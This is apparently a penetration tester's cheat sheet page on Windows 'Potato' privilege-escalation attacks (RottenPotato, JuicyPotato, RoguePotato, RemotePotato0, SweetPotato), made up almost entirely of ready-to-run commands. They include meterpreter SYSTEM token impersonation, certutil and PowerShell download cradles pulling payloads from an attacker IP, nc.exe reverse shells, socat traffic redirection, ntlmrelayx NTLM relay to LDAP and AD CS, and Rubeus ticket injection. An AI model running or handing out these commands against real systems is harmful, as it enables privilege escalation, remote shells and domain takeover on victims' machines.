TwitterGitHubBlogSponsor

Potatoes

RottenPotato

$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

LonelyPotato

JuicyPotato

$ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe
...Using pwsh reverse shell...
$ curl -L https://github.com/samratashok/nishang/raw/master/Shells/Invoke-PowerShellTcpOneLine.ps1 > rev.ps1
Cmd > certutil -urlcache -split -f http://10.10.13.37/j.exe C:\Windows\System32\spool\drivers\color\j.exe
Cmd > echo cmd /c powershell -exec bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" > rev.bat
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\rev.bat
...Using nc.exe...
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\nc.exe "10.10.13.37 1337 -e cmd"

RoguePotato

Redirect traffic that comes to 135 port on Attacker (10.10.13.37) with socat back to the Victim (192.168.1.11) on port 9999 (RogueOxidResolver is running locally on port 9999 on Victim):

$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9999

Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):

Cmd > .\RoguePotato.exe -r 10.10.13.37 -e "C:\windows\Temp\nc.exe 10.10.13.37 443 -e cmd" -l 9999

RemotePotato0

Get session ID of the user to pwn:

Cmd > query user
Cmd > quser

Hashes collector (modes 2, 3):

$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
Cmd > .\RemotePotato0.exe -m 2 -x 10.10.13.37 -p 9998 -s 5

Cross-protocol relay (modes 0, 1):

$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
$ ntlmrelayx.py -t ldap://192.168.1.11 --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5

Combining with ESC8:

$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp --adcs --template User --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5 -c "{f8842f8e-dafe-4b37-9d38-4e0714a61149}"
Cmd > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt

GenericPotato

EfsPotato

Tools

SweetPotato

Cmd > .\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"

MultiPotato

Last updated